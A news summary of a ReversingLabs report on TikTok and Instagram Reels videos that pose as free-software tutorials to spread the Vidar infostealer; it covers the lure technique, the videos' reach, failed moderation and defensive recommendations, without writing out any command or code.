Overview
- Security firm ReversingLabs disclosed in mid-June that threat actors are running two coordinated campaigns on TikTok and Instagram Reels that pose as tutorials promising free premium software to distribute the Vidar infostealer.
- One campaign posted polished, Windows‑branded videos instructing viewers to open PowerShell and paste an iex irm-style command that fetched Vidar from lookalike domains such as msget.run, a download pattern the researchers confirmed.
- The second campaign used comment-bait clips to funnel interested users to external sites such as d4ug.site that require surveys and redirects, preventing researchers from confirming the final payload delivered through those gated flows.
- ReversingLabs found the clips gained strong algorithmic traction—one tracked video recorded about 109,000 views with thousands of saves and shares—and investigators reported that platform moderation efforts failed when reports were rejected and warning comments were deleted.
- Researchers warned Vidar, a long-running infostealer sold as malware‑as‑a‑service that steals passwords, cookies, crypto wallets, and some 2FA artifacts, has improved evasion since an October 2025 update and urged firms to audit install privileges, enforce MFA, expand social‑media phishing training, deploy up-to-date endpoint protection, and use published IoCs to hunt related activity.